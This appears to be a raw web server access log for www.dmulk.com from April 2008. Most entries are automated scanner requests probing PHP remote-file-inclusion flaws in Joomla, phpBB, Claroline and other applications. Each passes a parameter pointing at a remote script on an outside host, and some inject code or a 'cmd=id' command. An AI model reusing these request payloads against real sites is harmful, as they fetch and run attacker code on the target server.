91.185.193.90 - - [07/Apr/2008:11:16:21 -0700] "GET /logs//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:17:10 -0700] "GET /logs/access_080106.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:17:10 -0700] "GET //admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:17:10 -0700] "GET /logs/access_080106.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:17:11 -0700] "GET /logs//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:17:11 -0700] "GET //admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:17:11 -0700] "GET /logs//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:17:12 -0700] "GET /logs/access_080106.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:17:13 -0700] "GET //admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:17:13 -0700] "GET /logs//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:18:13 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:18:21 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:18:47 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:18:54 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:19:01 -0700] "GET /logs/access_080106.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:19:02 -0700] "GET //admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:19:02 -0700] "GET /logs//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:11:19:02 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.193.60.15 - - [07/Apr/2008:11:19:15 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [07/Apr/2008:11:19:15 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.205.115 - - [07/Apr/2008:11:19:32 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:11:19:35 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.195.18 - - [07/Apr/2008:11:19:38 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://contactcraze.com/tanii.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.195.18 - - [07/Apr/2008:11:19:39 -0700] "GET //administrator/?mosConfig_absolute_path=http://contactcraze.com/tanii.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.195.18 - - [07/Apr/2008:11:19:39 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://contactcraze.com/tanii.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:20:33 -0700] "GET /logs/access_080106.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:20:33 -0700] "GET //admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:20:34 -0700] "GET /logs//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:38 -0700] "GET /mobileoffice/?N=D HTTP/1.1" 200 5024 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:38 -0700] "GET /megumi/?N=D HTTP/1.1" 200 937 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:42 -0700] "GET /megumi/earrings/ HTTP/1.1" 200 2081 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:43 -0700] "GET /mobileoffice/?S=A HTTP/1.1" 200 5024 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:43 -0700] "GET /megumi/Necklace/ HTTP/1.1" 200 4323 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:43 -0700] "GET /megumi/?M=A HTTP/1.1" 200 937 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:43 -0700] "GET /minamijewelry/flower.psd HTTP/1.1" 200 109558 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:44 -0700] "GET /minamijewelry/dream.psd HTTP/1.1" 200 109304 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:44 -0700] "GET /minamijewelry/minami_site3.psd HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:44 -0700] "GET /minamijewelry/kanji1.psd HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:20:45 -0700] "GET /minamijewelry/?D=A HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:20:59 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:21:49 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:21:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:21:51 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:22:01 -0700] "GET /logs/access_080216.log/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:22:02 -0700] "GET /main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:22:02 -0700] "GET /logs/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:22:23 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:11:22:53 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:11:22:54 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:11:22:54 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:22:59 -0700] "GET /megumi/?S=A HTTP/1.1" 200 937 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:22:59 -0700] "GET /mobileoffice/?M=A HTTP/1.1" 200 5024 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:11:22:59 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.193.60.15 - - [07/Apr/2008:11:23:00 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.195.18 - - [07/Apr/2008:11:23:05 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://contactcraze.com/tanii.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.91 - - [07/Apr/2008:11:23:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.189 - - [07/Apr/2008:11:23:50 -0700] "GET /logs/access_070902.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.149.195.18 - - [07/Apr/2008:11:23:52 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://contactcraze.com/tanii.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.195.18 - - [07/Apr/2008:11:23:52 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://contactcraze.com/tanii.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.195.18 - - [07/Apr/2008:11:23:53 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://contactcraze.com/tanii.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:24:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:24:00 -0700] "GET /megumi/earrings/?S=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:11:24:03 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:11:24:03 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:11:24:04 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.156 - - [07/Apr/2008:11:24:23 -0700] "GET /logs/access_070828.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:24:25 -0700] "GET /logs/?S=A HTTP/1.0" 200 42106 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:24:33 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:24:33 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:24:33 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:24:49 -0700] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:24:50 -0700] "GET /minamijewelry/html/ HTTP/1.1" 200 13287 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:24:50 -0700] "GET /minamijewelry/source_images/ HTTP/1.1" 200 2414 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:24:51 -0700] "GET /minamijewelry/?M=A HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:24:51 -0700] "GET /minamijewelry/?S=A HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
38.103.164.226 - - [07/Apr/2008:11:24:52 -0700] "GET /logs/access_071229.log/claroline/inc/claro_init_header.inc.php?includePath=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.103.164.226 - - [07/Apr/2008:11:24:53 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.103.164.226 - - [07/Apr/2008:11:24:53 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.23.226 - - [07/Apr/2008:11:25:13 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:25:18 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:25:20 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:25:20 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.95.82 - - [07/Apr/2008:11:25:30 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:25:31 -0700] "GET /logs/access_080215.log/administrator/?mosConfig_absolute_path=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:11:25:36 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:11:25:37 -0700] "GET //administrator/?mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:11:25:37 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:11:25:42 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:25:48 -0700] "GET /logs/access_080215.log/administrator/?mosConfig_absolute_path=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:26:04 -0700] "GET /funny/?N=D HTTP/1.1" 200 808 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:26:04 -0700] "GET /megumi/Bracelet/ HTTP/1.1" 200 1705 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:26:05 -0700] "GET /megumi/?D=A HTTP/1.1" 200 937 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:26:05 -0700] "GET /mobileoffice/?D=A HTTP/1.1" 200 5024 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:26:05 -0700] "GET /minamijewelry/bird.psd HTTP/1.1" 200 109644 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:26:06 -0700] "GET /minamijewelry/moon.psd HTTP/1.1" 200 108656 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:26:12 -0700] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.157.176.245 - - [07/Apr/2008:11:26:34 -0700] "GET /logs/index.php?func=http://www.cpjtechniek.nl/test_1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
202.157.176.245 - - [07/Apr/2008:11:26:35 -0700] "GET /index.php?func=http://www.cpjtechniek.nl/test_1.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
38.103.164.226 - - [07/Apr/2008:11:26:38 -0700] "GET /logs/access_080117.log/claroline/inc/claro_init_header.inc.php?includePath=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.112.35.27 - - [07/Apr/2008:11:26:47 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.112.35.27 - - [07/Apr/2008:11:26:49 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:26:57 -0700] "GET /main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:26:57 -0700] "GET /main.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:27:03 -0700] "GET /logs/access_070915.log HTTP/1.1" 200 65779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:27:41 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:28:02 -0700] "GET /logs/access_080104.log HTTP/1.1" 200 467398 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:11:28:20 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:28:50 -0700] "GET /logs/access_080118.log/%030/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:28:50 -0700] "GET /%030/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:28:51 -0700] "GET /logs/%030/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.171.46.241 - - [07/Apr/2008:11:29:27 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.office-events.de/t.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:29:55 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:29:55 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:29:55 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:30:24 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:30:26 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:30:27 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:11:31:12 -0700] "GET /logs/access_080226.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.188 - - [07/Apr/2008:11:31:15 -0700] "GET /plans/?D=D HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:32:18 -0700] "GET /logs/access_070910.log HTTP/1.0" 200 50863 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:32:18 -0700] "GET /logs/?M=A HTTP/1.0" 200 42106 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:32:20 -0700] "GET /logs/access_071113.log HTTP/1.0" 200 4345 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:32:27 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
